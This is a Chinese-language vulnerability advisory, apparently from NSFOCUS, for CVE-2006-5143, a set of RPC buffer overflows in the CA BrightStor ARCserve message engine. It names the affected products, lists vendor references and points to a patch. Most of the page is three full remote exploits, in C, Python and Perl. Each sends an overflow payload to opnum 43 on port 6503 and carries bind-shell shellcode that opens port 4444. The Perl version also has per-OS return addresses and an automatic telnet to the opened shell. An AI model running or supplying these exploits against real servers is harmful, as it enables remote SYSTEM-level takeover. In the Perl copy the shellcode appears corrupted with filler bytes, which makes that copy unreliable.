安全研究
安全漏洞
CA多个产品消息引擎RPC服务器多个缓冲区溢出漏洞
发布日期:2006-10-05
更新日期:2006-11-23
受影响系统:
Computer Associates BrightStor ARCserve Backup 9.01描述:
Computer Associates BrightStor ARCserve Backup 11.5
Computer Associates BrightStor Enterprise Backup 10.5
Computer Associates Server Protection r2
Computer Associates Business Protection r2
BUGTRAQ ID: 20365
CVE(CAN) ID: CVE-2006-5143
Computer Associates是世界领先的安全厂商,产品包括多种杀毒软件及备份恢复系统。
CA多个产品的消息引擎处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
ASCORE.dll是CA多个产品的消息引擎RPC服务器所使用的DLL。当消息引擎(msgeng.exe)在处理TCP 6503端口ID为dc246bf0-7a7a-11ce-9f88-00805fe43838的端点上的RPC请求时,可能会触发一个堆溢出和一个栈溢出。有漏洞的操作分别是由这个端口上的Opnum 43和Opnum 45指定的。如果用户能够发送超长字符串做为任何一个上述opcode的第二个参数的话,就会导致以系统权限执行任意指令。
<*来源:livesploit.com (http://www.livesploit.com/)
链接:http://secunia.com/advisories/22285/
http://marc.theaimsgroup.com/?l=bugtraq&m=116015138022626&w=2
http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp
http://www.lssec.com/advisories/LS-20060313.pdf
http://www.lssec.com/advisories/LS-20060330.pdf
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* LSsec.com
*
* CA BrightStor ARCserve Backup v11.5 Message Engine Remote Heap Overflow Exploit
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#define _DCE_RPC_REQ 0x00
#define _DCE_RPC_BIND 0x0B
#define PKT_LEN 2048+24
#define STUB_LEN 2048
unsigned char jmp[]="\xeb\x0a\x90\x90";
unsigned char esi[]="\xbf\x75\x40\x2d";
unsigned char uef[]="\x4c\x14\x54\x7c";
//4444
unsigned char bindshell[]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
"\x6f\xe3\x2a\x83\xeb\xfc\xe2\xf4\x1c\x05\x08\x67\x08\x96\x1c\xd5"
"\x1f\x0f\x68\x46\xc4\x4b\x68\x6f\xdc\xe4\x9f\x2f\x98\x6e\x0c\xa1"
"\xaf\x77\x68\x75\xc0\x6e\x08\x63\x6b\x5b\x68\x2b\x0e\x5e\x23\xb3"
"\x4c\xeb\x23\x5e\xe7\xae\x29\x27\xe1\xad\x08\xde\xdb\x3b\xc7\x02"
"\x95\x8a\x68\x75\xc4\x6e\x08\x4c\x6b\x63\xa8\xa1\xbf\x73\xe2\xc1"
"\xe3\x43\x68\xa3\x8c\x4b\xff\x4b\x23\x5e\x38\x4e\x6b\x2c\xd3\xa1"
"\xa0\x63\x68\x5a\xfc\xc2\x68\x6a\xe8\x31\x8b\xa4\xae\x61\x0f\x7a"
"\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa"
"\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28"
"\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79"
"\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb"
"\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42"
"\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63"
"\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d"
"\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a"
"\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07"
"\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5"
"\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b"
"\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa"
"\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75"
"\xb3\x90\x35\xd5\x30\x6f\xe3\x2a";
typedef struct dceRpc{
unsigned char ver;
unsigned char ver_minor;
unsigned char pkt_type;
unsigned char pkt_flags;
unsigned long data_repres;
unsigned short frag_len;
unsigned short auth_len;
unsigned long caller_id;
} DCE_RPC, *PDCE_RPC;
typedef struct dceRpc2{
unsigned long alloc_hint;
unsigned short con_id;
unsigned short opnum;
} DCE_RPC2, *PDCE_RPC2;
typedef struct dceRpcBind{
unsigned short max_xmit;
unsigned short max_recv;
unsigned long asc_group;
unsigned long num_con_items;
unsigned short con_id;
unsigned short num_trn_items;
} DCE_RPC_BIND, *PDCE_RPC_BIND;
int
lsHex2Raw(unsigned char* s, unsigned char* out)
{
unsigned long i;
unsigned long j=0;
unsigned long len;
unsigned long ret=0;
len=strlen(s);
for(i=0; i<len; i+=2){
if((s[i]>=0x30)&&(s[i]<=0x39))
j=s[i]-0x30;
else
j=s[i]-0x61+10;
j*=16;
if((s[i+1]>=0x30)&&(s[i+1]<=0x39))
j+=s[i+1]-0x30;
else
j+=s[i+1]-0x61+10;
out[ret]=(unsigned char)j;
ret++;
}
return(ret);
}
void
lsInverse(unsigned char* io, unsigned long len)
{
unsigned char c;
unsigned long i;
for(i=0; i<len/2; i++){
c=io[len-i-1];
io[len-i-1]=io[i];
io[i]=c;
}
}
int
lsEncodeUuid(unsigned char* uuid, unsigned char* out)
{
unsigned ar=0;
unsigned cnt=0;
unsigned long i;
unsigned long len;
unsigned long ret;
unsigned char* ptr;
ptr=uuid;
len=strlen(uuid);
for(i=0; i<len; i++){
if(uuid[i]=='-'){
uuid[i]='\0';
if(ar<3){
ret=lsHex2Raw(ptr, out);
lsInverse(out, ret);
out+=ret;
cnt+=ret;
}else{
ret=lsHex2Raw(ptr, out);
out+=ret;
cnt+=ret;
}
ptr=uuid+i+1;
ar++;
}
}
out[len]='\0';
ret=lsHex2Raw(ptr, out);
out+=ret;
cnt+=ret;
return(cnt);
}
unsigned char*
lsDceRpcBind(unsigned long cid, unsigned char* uuid, unsigned short ver, unsigned long* pktLen){
unsigned char* pkt;
unsigned char* tmp;
unsigned char transferSyntax[]="8a885d04-1ceb-11c9-9fe8-08002b104860";
unsigned short ret;
unsigned long cnt;
PDCE_RPC_BIND rpc_bind;
PDCE_RPC rpc;
pkt=(unsigned char*)calloc(2048, 1);
/* 2nd half */
tmp=pkt;
pkt+=sizeof(DCE_RPC);
rpc_bind=(PDCE_RPC_BIND)pkt;
rpc_bind->max_xmit = 0x16D0; //Max Xmit Frag
rpc_bind->max_recv = 0x16D0; //Max Recv Frag
rpc_bind->asc_group = 0; //Assoc Group
rpc_bind->num_con_items = 1; //Num Ctx Items
rpc_bind->con_id = 0; //Context ID
rpc_bind->num_trn_items = 1; //Num Trans Items
pkt+=sizeof(DCE_RPC_BIND);
cnt=lsEncodeUuid(uuid, pkt); //Interface UUID
pkt+=cnt;
memcpy(pkt, &ver, sizeof(short)); //Interface Ver
pkt+=sizeof(short);
*pkt++=0; //Interface Ver Minor
*pkt++=0; //Interface Ver Minor
cnt=lsEncodeUuid(transferSyntax, pkt); //Transfer Syntax
pkt+=cnt;
*pkt++=2; //Transfer Syntax Ver
*pkt++=0; //Transfer Syntax Ver
/* 1st half */
ret=pkt+2-tmp;
rpc=(PDCE_RPC)tmp;
rpc->ver = 5; //Version
rpc->ver_minor = 0; //Version (minor)
rpc->pkt_type = _DCE_RPC_BIND; //Packet Type
rpc->pkt_flags = 3; //Packet Flags
rpc->data_repres = 16; //Data Representation
rpc->frag_len = ret; //Frag Length
rpc->auth_len = 0; //Auth Length
rpc->caller_id = cid; //Call ID
*pktLen=ret;
return(tmp);
}
unsigned char*
lsDceRpcReq(unsigned long cid, unsigned long opnum, unsigned char* uuid, unsigned int encoding, unsigned long flags, unsigned long* pktLen){
unsigned char* pkt;
unsigned char* tmp;
unsigned char stub[STUB_LEN];
unsigned short ret;
unsigned long cnt;
PDCE_RPC rpc;
PDCE_RPC2 rpc2;
pkt=(unsigned char*)calloc(PKT_LEN, 1);
/* 2nd half */
tmp=pkt;
pkt+=sizeof(DCE_RPC);
rpc2=(PDCE_RPC2)pkt;
rpc2->alloc_hint = STUB_LEN; //Stub Data
rpc2->con_id = 0; //Context ID
rpc2->opnum = opnum; //Operation Number
pkt+=sizeof(DCE_RPC2);
if(encoding){
cnt=lsEncodeUuid(uuid, pkt); //Interface UUID
pkt+=cnt;
}
/* stub modification */
memset(stub, 0x90, STUB_LEN);
memcpy(stub+680, jmp, sizeof(jmp)-1);
//call dword ptr ds:[esi+48]
memcpy(stub+684, esi, sizeof(esi)-1);
//UnhandledExceptionFilter
memcpy(stub+688, uef, sizeof(uef)-1);
memcpy(stub+692, bindshell, sizeof(bindshell)-1);
/* ----------------- */
memcpy(pkt, stub, STUB_LEN);
pkt+=STUB_LEN;
/* 1st half */
ret=pkt-tmp;
rpc=(PDCE_RPC)tmp;
rpc->ver = 5; //Version
rpc->ver_minor = 0; //Version (minor)
rpc->pkt_type = _DCE_RPC_REQ; //Packet Type
rpc->pkt_flags = flags; //Packet Flags
rpc->data_repres = 16; //Data Representation
rpc->frag_len = ret; //Frag Length
rpc->auth_len = 0; //Auth Length
rpc->caller_id = cid; //Call ID
*pktLen=ret;
return(tmp);
}
int
lsConnect(unsigned char* host, unsigned short port){
int s;
struct hostent* he;
struct sockaddr_in addr;
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
if((he=gethostbyname(host))==NULL){
printf("[-] unable to resolve %s\n", host);
exit(1);
}
if((s=socket(AF_INET, SOCK_STREAM, 0))<0){
printf("[-] socket failed\n");
exit(1);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr*)he->h_addr);
memset(&(addr.sin_zero), '\0', 8);
if(connect(s, (struct sockaddr*)&addr, sizeof(struct sockaddr))<0){
printf("[-] connect failed\n");
exit(1);
}
return(s);
}
void
lsSend(int s, unsigned char* pkt, unsigned long cnt){
if(send(s, pkt, cnt, 0)==-1){
printf("[-] send failed\n");
exit(1);
}
}
void
lsRecv(int s){
char recvBuf[4096];
if(recv(s, recvBuf, 4096, 0)<=0){
printf("[-] recv failed\n");
exit(1);
}
}
int
main(int argc, char* argv[]){
int s;
unsigned long cnt;
unsigned char* pkt=NULL;
unsigned char uuidSave[64];
/**********************************************************/
int opnum=43;
unsigned short port= 6503;
unsigned char uuid[]="dc246bf0-7a7a-11ce-9f88-00805fe43838";
/**********************************************************/
if(argc!=2){
printf("\n[-] Usage: %s <ip>\n", argv[0]);
exit(1);
}
printf("\n[+] LSsec.com\n");
printf("\n[+] CA BrightStor ARCserve Backup v11.5 Message Engine Remote Heap Overflow Exploit\n");
s=lsConnect(argv[1], port);
memset(uuidSave, '\0', sizeof(uuidSave));
strncpy(uuidSave, uuid, strlen(uuid));
//bind packet
pkt=lsDceRpcBind(1, uuid, 1, &cnt);
lsSend(s, pkt, cnt);
lsRecv(s);
free(pkt);
//request
pkt=lsDceRpcReq(1, opnum, uuidSave, 0, 0x03, &cnt);
lsSend(s, pkt, cnt);
lsRecv(s);
free(pkt);
return(0);
}
#!/usr/bin/python
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
# to port to other platforms. The exploit overwrites the
# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
# address of call dword ptr [esi +4C] located in user32.dll. At the time when
# UEF is called esi +4C contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import struct
import sys
def DCEconnectAndExploit(target):
trans = transport.TCPTransport(target, 6503)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
request = "A" * 676
request += "\x90\x90\x90\x90"
request += "\x90\x90\xeb\x0a"
#Call dword ptr [esi +4C] from user32.dll
request += struct.pack("<L", 0x77E4FB7A)
#Overwrite UnhandledExceptionFilter in Windows 2000 SP0
request += struct.pack("<L", 0x77EE044C)
request += "\x90\x90\x90\x90" * 2
#Portbinding shellcode; Opens shell on TCP port 4444
request += "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
request += "\x6f\xe3\x2a\x83\xeb\xfc\xe2\xf4\x1c\x05\x08\x67\x08\x96\x1c\xd5"
request += "\x1f\x0f\x68\x46\xc4\x4b\x68\x6f\xdc\xe4\x9f\x2f\x98\x6e\x0c\xa1"
request += "\xaf\x77\x68\x75\xc0\x6e\x08\x63\x6b\x5b\x68\x2b\x0e\x5e\x23\xb3"
request += "\x4c\xeb\x23\x5e\xe7\xae\x29\x27\xe1\xad\x08\xde\xdb\x3b\xc7\x02"
request += "\x95\x8a\x68\x75\xc4\x6e\x08\x4c\x6b\x63\xa8\xa1\xbf\x73\xe2\xc1"
request += "\xe3\x43\x68\xa3\x8c\x4b\xff\x4b\x23\x5e\x38\x4e\x6b\x2c\xd3\xa1"
request += "\xa0\x63\x68\x5a\xfc\xc2\x68\x6a\xe8\x31\x8b\xa4\xae\x61\x0f\x7a"
request += "\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa"
request += "\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28"
request += "\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79"
request += "\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb"
request += "\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42"
request += "\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63"
request += "\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d"
request += "\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a"
request += "\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07"
request += "\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5"
request += "\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b"
request += "\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa"
request += "\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75"
request += "\xb3\x90\x35\xd5\x30\x6f\xe3\x2a"
dce.call(43, request)
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target ip>\n' % sys.argv[0]
sys.exit(-1)
DCEconnectAndExploit(target)
#!/usr/bin/perl
#
# original exploit by lssec.com this is a perl porting
#
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV < 3) {
print "--------------------------------------------------------------------\n";
print "Usage : BrightStoreARCServer-11-5-4targets.pl -hTargetIPAddress -oTargetReturnAddress\n";
print " Return address: \n";
print " 1 - Windows 2k Sp4 English Version\n";
print " 2 - Windows 2k Sp4 Italian Version\n";
print " 3 - Windows XP Pro Sp1 English Version\n";
print " 4 - Windows XP Pro Sp0 English Version\n";
print " If values not specified, Windows 2k Sp4 will be used.\n";
print " Example : ./BrightStoreARCServer-11-5-4targets.pl -h127.0.0.1 -o1 -o1\n";
print "--------------------------------------------------------------------\n";
}
use IO::Socket::INET;
my $host = 10.0.0.2;
my $port = 6503;
my $reply;
my $request;
my $jmp="\xeb\x0a\x90\x90"; # JMP over ret and uef to our shellcode
foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$uef = $1 if ($_=~/-o(.*)/);
$ret = $1 if ($_=~/-o(.*)/);
}
switch ($uef) {
case 1 { $uef="\x4c\x14\x54\x7c" } # Win2k SP4 English version
case 2 { $uef="\x4c\x14\x68\x79" } # Win2k SP4 Italian version
case 3 { $uef="\xb4\x73\xed\x77" } # WinXP Pro English SP1 version
case 4 { $uef="\xb4\x63\xed\x77" } # WinXP Pro English SP0 version
}
switch ($ret) {
case 1 { $ret="\xbf\x75\x40\x2d" } # Win2k SP4 English version CALL DWORD PTR DS:[ESI+48] in qclient.dll
case 2 { $ret="\xbf\x75\x40\x2d" } # Win2k SP4 Italian version CALL DWORD PTR DS:[ESI+48] in qclient.dll
case 3 { $ret="\x52\xbf\x04\x78" } # WinXP Pro English SP1 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
case 4 { $ret="\xd7\xe9\xd0\x77" } # WinXP Pro English SP0 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
}
my $shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0".
"\x00\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f".
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf".
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xbA\xbb\xbc\xbd\xbe\xbf".
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf".
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf".
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef".
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff".
"\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa".
"\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28".
"\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79".
"\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb".
"\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42".
"\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63".
"\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d".
"\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a".
"\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07".
"\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5".
"\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b".
"\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa".
"\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75".
"\xb3\x90\x35\xd5\x30\x6f\xe3\x2a";
my $uuid="\x05". #version
"\x00". #version minor
"\x0b". #packet bind
"\x03". #packet flag
"\x10\x00\x00\x00". #data rapresentation
"\x48\x00". #fragment length
"\x00\x00". #auth length
"\x01\x00\x00\x00". #call id
"\xd0\x16\xd0\x16".
"\x00\x00\x00\x00". #assoc group
"\x01\x00\x00\x00\x00\x00\x01\x00".
"\xf0\x6b\x24\xdc\x7a\x7a\xce\x11\x9f\x88\x00\x80\x5f\xe4\x38\x38". #uuid
"\x01\x00". #interface ver
"\x00\x00". #interface ver minor
"\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60". #transfer syntax
"\x02\x00\x00\x00"; #syntax ver
my $special="\x05". #version
"\x00". #version minor
"\x00". #packet type request
"\x03". #packet flags
"\x10\x00\x00\x00". #data rapresentation
"\x18\x08". #frag length
"\x00\x00". #auth length
"\x01\x00\x00\x00". #call id
"\x00\x08\x00\x00". #alloc hint
"\x00\x00". #contex id
"\x2b\x00"; #opnum 43
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
$request = $uuid;
send $socket, $request, 0;
print "[+] Sent uuid request\n";
recv($socket, $reply, 1024, 0);
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 1st request\n";
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 2nd request\n";
print " + Connect on 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
建议:
厂商补丁:
Computer Associates
-------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://supportconnect.ca.com/
浏览次数:5829
严重程度:0(网友投票)
绿盟科技给您安全的保障